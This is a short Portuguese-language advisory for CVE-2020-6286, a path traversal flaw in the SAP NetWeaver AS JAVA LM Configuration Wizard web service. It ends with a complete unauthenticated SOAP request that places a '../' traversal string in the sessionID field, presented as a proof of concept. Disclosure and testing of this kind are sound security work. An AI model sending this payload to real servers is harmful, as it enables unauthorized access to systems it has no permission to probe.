
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Atravessamento de Diretório
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal
O SAP NetWeaver é a plataforma tecnológica integrada da SAP e a base técnica de todas as aplicações SAP desde o SAP Business Suite. O SAP NetWeaver é uma plataforma de aplicação e integração orientada a serviços que fornece um ambiente de desenvolvimento e execução para aplicações SAP, e também pode ser usado para desenvolvimento personalizado e integração com outras aplicações e sistemas. A validação insuficiente do caminho de entrada de um determinado parâmetro no serviço web do SAP NetWeaver AS JAVA (LM Configuration Wizard), versões 7.30, 7.31, 7.40, 7.50, permite que um atacante não autenticado explore um método para baixar arquivos zip para um diretório específico, levando a Path Traversal.
Para uma prova de conceito segura, você pode usar a seguinte solicitação. Se o arquivo zip existir no host remoto, ele baixa o arquivo 111.zip
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>